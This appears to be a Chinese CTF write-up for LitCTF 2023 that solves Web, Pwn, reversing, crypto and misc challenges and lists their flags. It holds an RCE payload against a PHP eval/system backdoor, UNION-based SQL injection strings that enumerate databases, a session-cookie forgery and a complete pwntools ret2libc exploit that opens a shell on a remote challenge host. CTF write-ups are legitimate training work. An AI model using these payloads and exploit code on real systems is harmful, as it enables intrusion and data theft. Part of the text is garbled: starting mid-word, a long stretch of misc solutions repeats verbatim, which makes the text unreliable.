echo "<p>can can need Vim </p>";
if ($_POST['password'] === base65_encode($password)) {
echo "<p>Oh You got my password!</p>";
eval(system($_POST['cmd']));
}
?>
把Give_Me_Your_Flag进行base64编码之后得到:R2l2ZV9NZV9Zb3VyX0ZsYWc=,之后POST传入,然后进行rce,payload如下:
password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&cmd=cat /flag
flag:NSSCTF{550f422b-6b60-4216-828a-4521b82fe56f}
10、这是什么?SQL !注一下 !
发现给了一句源码:
$sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
$result = $conn->query($sql);
由于前半部分存在多个(,因此后边需要对括号进行闭合,之后和寻常的sql注入一样:
查数据库:
?id=1))))))union select 1,group_concat(schema_name) from information_schema.schemata--+
查表:
?id=1))))))union select 1,group_concat(table_name) from information_schema.tables where table_schema='ctftraining'--+
查字段名:
?id=1))))))union select 1,group_concat(column_name) from information_schema.columns where table_schema='ctftraining'--+
查flag:NSSCTF{d97bb244-e6e7-4ee9-b764-2a28571532e5}
?id=1))))))union select 1,flag from ctftraining.flag--+
11、Flag点击就送!
随便输入一个1,之后提示只有管理员能进,应该是Cookie伪造,那么看一下Cookie,
session=eyJuYW1lIjoiMSJ9.Zmbx8g.9zpH8poegrPcOfauIe1GtO1ht64
应该是session伪造,猜测key为LitCTF,修改1为admin,最后拿到flag:NSSCTF{fdbe1619-9458-4e89-84fa-6e9b308e5507}
Pwn:
1、只需要nc一下~
呜呜呜,这个题我竟然懵逼了,最后发现是在环境变量中 (>_<)。
直接nc之后echo $FLAG即可获得flag:NSSCTF{548baafa-2de1-41c7-aafe-29b90be4f940}
2、口算题卡
nc连接之后发现是一个加减法运算(?)
root@MSI:/mnt/c/Users/20820/Downloads# nc node4.anna.nssctf.cn 28007
__ ________ _________ ______ _________ ______
/_/\ /_______/\ /________/\ /_____/\ /________/\ /_____/\
\:\ \ \__.::._\/ \__.::.__\/ \:::__\/ \__.::.__\/ \::::_\/_
\:\ \ \::\ \ \::\ \ \:\ \ __ \::\ \ \:\/___/\
\:\ \____ _\::\ \__ \::\ \ \:\ \/_/\ \::\ \ \:::._\/
\:\/___/\ /__\::\__/\ \::\ \ \:\_\ \ \ \::\ \ \:\ \
\_____\___________________ \__\_____ \_____\______ \__\/ \_\/
/_____/\ /_____/\ /_____/\ /_____/\
\:::_:\ \ \:::_ \ \ \:::_:\ \ \:::_:\ \
_\:\| \:\ \ \ \ _\:\| /_\:\ \
_______ /::_/__ \:\ \ \ \ /::_/__ \::_:\ \
/______/\ \:\____/\ \:\_\ \ \ \:\____/\ /___\:\ '
\__::::\/ \_____\/ \_____\/ \_____\/ \______/
Welcome to the LitCTF2023 Verbal Problem Card!
You will be presented with 100 addition and subtraction problems.
Your goal is to answer all of them correctly to get the flag!
if you wrong, you will be kicked out of the game.
Good luck & Have fun!
推测需要加减到一定数目才会出flag,试试吧,exp如下:
from pwn import *
io = remote("node4.anna.nssctf.cn",28007)
io.recvuntil(b"Have fun!\n")
for i in range(100):
io.recvuntil(b"What is")
key = io.recvuntil(b"?")
payload = flat([
str(eval(key[:-1]))
])
print(eval(key[:-1]))
io.sendline(payload)
io.interactive()
最后得到flag:Congratulations! Here’s your flag:NSSCTF{757d9dc8-d946-4f97-9370-63876e41aeaf}
3、狠狠的溢出涅~
检查保护:
root@MSI:/mnt/c/Users/20820/Downloads/ubuntu_pwn# checksec pwn4
[*] '/mnt/c/Users/20820/Downloads/ubuntu_pwn/pwn4'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
IDA 反编译;
int __fastcall main(int argc, const char **argv, const char **envp)
{
char buf[91]; // [rsp+10h] [rbp-60h] BYREF
unsigned __int8 v5; // [rsp+6Bh] [rbp-5h]
int v6; // [rsp+6Ch] [rbp-4h]
v6 = 0;
setbuf(stdin, 0LL);
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
puts("Leave your message:");
read(0, buf, 0x200uLL);
v5 = strlen(buf);
if ( v5 > 0x50u )
{
puts("hacker");
exit(0);
}
puts("Ok,Message Received");
return 0;
}
发现存在栈溢出漏洞,但是,也存在过滤,就是获取buf的大小,然后与0x50u进行大小比较,没有后门函数,那么就是个ret2libc,直接套公式做了。
先通过puts函数泄露puts函数本身的真实地址,之后通过libc文件或者LibcSearcher库查版本拿system和/bin/sh的地址,exp如下:
from pwn import *
context (os='linux', arch='amd64', log_level='debug')
context.terminal = ['tmux','splitw','-h','-l','140']
pwnfile = './pwn4'
elf = ELF(pwnfile)
libc = ELF('./libc-2.31.so')
#io = process(pwnfile)
io = remote('node4.anna.nssctf.cn',28607)
#gdb.attach(io)
pop_rdi = 0x4007d3
pop_ret = 0x400556
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x4006B0
pay = b'\x00' * (0x60+8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
io.sendlineafter('message:\n', pay)
puts_addr = u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = puts_addr - libc.sym['puts']
system_addr = libc_base + libc.symbols['system']
bin_sh = libc_base + next(libc.search('/bin/sh\x00'))
pay2 = b'\x00' * (0x68) + p64(pop_ret) + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
io.recvuntil("message:")
io.sendline(pay2)
io.interactive()
flag:NSSCTF{u_r_master_of_stackoverflow_and_intoverflow}
Re:
1、世界上最棒的程序员
shift+f12直接找到flag:Flag: LitCTF{I_am_the_best_programmer_ever}
2、ez_XOR:
直接上源码:
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [esp+0h] [ebp-80h]
const char **v5; // [esp+4h] [ebp-7Ch]
const char **v6; // [esp+8h] [ebp-78h]
char Str1[50]; // [esp+1Ch] [ebp-64h] BYREF
char Str2[26]; // [esp+4Eh] [ebp-32h] BYREF
__int16 v9; // [esp+68h] [ebp-18h]
int v10; // [esp+6Ah] [ebp-16h]
int v11; // [esp+6Eh] [ebp-12h]
int v12; // [esp+72h] [ebp-Eh]
int v13; // [esp+76h] [ebp-Ah]
int v14; // [esp+7Ah] [ebp-6h]
__int16 v15; // [esp+7Eh] [ebp-2h]
__main();
strcpy(Str2, "E`}J]OrQF[V8zV:hzpV}fVF[t");
v9 = 0;
v10 = 0;
v11 = 0;
v12 = 0;
v13 = 0;
v14 = 0;
v15 = 0;
printf("Enter The Right FLAG:");
scanf("%s", Str1);
XOR(Str1, 3);
if ( !strcmp(Str1, Str2) )
{
printf("U Saved IT!\n");
return 0;
}
else
{
printf("Wrong!Try again!\n");
return main(v4, v5, v6);
}
}
XOR函数如下:
size_t __cdecl XOR(char *Str, char a2)
{
size_t result; // eax
unsigned int i; // [esp+2Ch] [ebp-Ch]
for ( i = 0; ; ++i )
{
result = strlen(Str);
if ( i >= result )
break;
Str[i] ^= 3 * a2;
}
return result;
}
那么,大致可以知道了,E`}J]OrQF[V8zV:hzpV}fVF[t字段与9进行异或运算,所以,可以写出如下exp:
a = "E`}J]OrQF[V8zV:hzpV}fVF[t"
b = ""
for i in a:
c = ord(i) ^ 9
b += chr(c)
print(b)
flag:LitCTF{XOR_1s_3asy_to_OR}
3、enbase64
打断点动态调试一下。然后就能看到source:gJ1BRjQie/FIWhEslq7GxbnL26M4+HXUtcpmVTKaydOP38of5v90ZSwrkYzCAuND
解码即可,再看basecheck(Str1)中有str1的值,然后base64解码即可:
flag:LitCTF{B@5E64_l5_tooo0_E3sy!!!}
Crypto:
1、梦想是红色的 (初级)
自由友善公正公正敬业法治自由自由和谐平等自由自由公正法治诚信民主诚信自由自由诚信民主爱国友善平等诚信富强友善爱国自由诚信民主敬业爱国诚信民主友善爱国平等爱国爱国敬业敬业友善爱国公正敬业爱国敬业和谐文明诚信文明友善爱国自由诚信民主爱国爱国诚信和谐友善爱国自由友善平等爱国友善平等友善自由诚信自由平等爱国爱国敬业敬业友善爱国敬业敬业友善自由友善平等诚信自由法治诚信和谐
一眼社会主义核心价值观加密,无脑梭:LitCTF{为之则易,不为则难}
2、Hex?Hex!(初级)
4c69744354467b746169313131636f6f6c6c616161217d
提示hex了,无脑十六进制解密:LitCTF{tai111coollaaa!}
3、你是我的关键词(Keyworld) (初级)
IFRURC{X0S_YP3_JX_HBXV0PA}
关键字加密,key是YOU,提示很明显:LITCTF{Y0U_AR3_MY_KEYW0RD}
4、家人们!谁懂啊,RSA签到都不会 (初级)
from Crypto.Util.number import *
from secret import flag
m = bytes_to_long(flag)
p = getPrime(512)
q = getPrime(512)
e = 65537
n = p*q
c = pow(m,e,n)
print(f'p = {p}')
print(f'q = {q}')
print(f'c = {c}')
'''
p = 12567387145159119014524309071236701639759988903138784984758783651292440613056150667165602473478042486784826835732833001151645545259394365039352263846276073
q = 12716692565364681652614824033831497167911028027478195947187437474380470205859949692107216740030921664273595734808349540612759651241456765149114895216695451
c = 108691165922055382844520116328228845767222921196922506468663428855093343772017986225285637996980678749662049989519029385165514816621011058462841314243727826941569954125384522233795629521155389745713798246071907492365062512521474965012924607857440577856404307124237116387085337087671914959900909379028727767057
'''
大佬直接用工具一把梭GitHub - spmonkey/Crypto 直接工具直接解密即可,我不知为啥下载不了这个工具,所以直接上答案了:
flag:LitCTF{it_is_easy_to_solve_question_when_you_know_p_and_q}
Misc;
1、What_1s_BASE (初级)
TGl0Q1RGe0tGQ19DcjR6eV9UaHVyM2RheV9WX21lXzUwfQ==
直接base64解码即可:LitCTF{KFC_Cr4zy_Thur3day_V_me_50}
2、404notfound (初级)
一张图片,记事本打开,前几行有flag:LitCTF{Its_404_but_1ts_n0t_a_page}
3、这羽毛球怎么只有一半啊(恼 (初级)
拖到010里修改高度,之后得到flag:LitCTF{Fl4g_0fcourse!}
4、喜欢我的压缩包么 (初级)
提示压缩包密码是6位数字,直接爆破解出密码是114514,好臭的密码:LitCTF{Do-u-like-my-zip-p4ck?}
5、Take me hand (初级)
流量包分析,随便追踪一个http,在请求的POST数据中找到flag,经过url解码之后得到:LitCTF{Give_y0ur_hand_to_me!!!_plz}
6、破损的图片(初级)
文件用010editor编辑,添上%png…,也就是89504E470D0A1A0A,再将图片重命名为.png图片,打开图片便是flag:LitCTF{May you, the beauty of this world, always shine.}
7、Osint小麦果汁
我tm,想暴打出题人,算了,忍忍。
上面看到一个很明显的字符,看起来像是wifi名,hacker&craft,直接在百度地图搜索黑客,发现了一个名字,黑客与精酿,flag:LitCTF{黑客与精酿}
8、easy_shark
又是个欺负我010有问题,真服了,想暴打出题人。
还是说下思路就行了吧,拖进010,修改 90 00 为 00 00即可,然后不用密码解压,追踪http流,在多个http流中找到了一个php一句话木马,然后再找,第五十几个就能找到个方程,然后两个key,应该是仿射密码,以及#后面是一个字符串,格式很想flag。之后仿射密码解决:LitCTF{w13e5hake_1s_a_900d_t3a771c_t001_a}
9、OSINT 探姬去哪了?_0
又是社工 (T^T):
otfound (初级)
一张图片,记事本打开,前几行有flag:LitCTF{Its_404_but_1ts_n0t_a_page}
3、这羽毛球怎么只有一半啊(恼 (初级)
拖到010里修改高度,之后得到flag:LitCTF{Fl4g_0fcourse!}
4、喜欢我的压缩包么 (初级)
提示压缩包密码是6位数字,直接爆破解出密码是114514,好臭的密码:LitCTF{Do-u-like-my-zip-p4ck?}
5、Take me hand (初级)
流量包分析,随便追踪一个http,在请求的POST数据中找到flag,经过url解码之后得到:LitCTF{Give_y0ur_hand_to_me!!!_plz}
6、破损的图片(初级)
文件用010editor编辑,添上%png…,也就是89504E470D0A1A0A,再将图片重命名为.png图片,打开图片便是flag:LitCTF{May you, the beauty of this world, always shine.}
7、Osint小麦果汁
我tm,想暴打出题人,算了,忍忍。
上面看到一个很明显的字符,看起来像是wifi名,hacker&craft,直接在百度地图搜索黑客,发现了一个名字,黑客与精酿,flag:LitCTF{黑客与精酿}
8、easy_shark
又是个欺负我010有问题,真服了,想暴打出题人。
还是说下思路就行了吧,拖进010,修改 90 00 为 00 00即可,然后不用密码解压,追踪http流,在多个http流中找到了一个php一句话木马,然后再找,第五十几个就能找到个方程,然后两个key,应该是仿射密码,以及#后面是一个字符串,格式很想flag。之后仿射密码解决:LitCTF{w13e5hake_1s_a_900d_t3a771c_t001_a}
9、OSINT 探姬去哪了?_0
又是社工 (T^T):
根据属性中的经纬度找到了一个地方,嘉兴市秀洲区,然后高德地图搜索"嘉兴市秀洲区 电信",出现的是电信大厦,所以:LitCTF{中国电信大厦}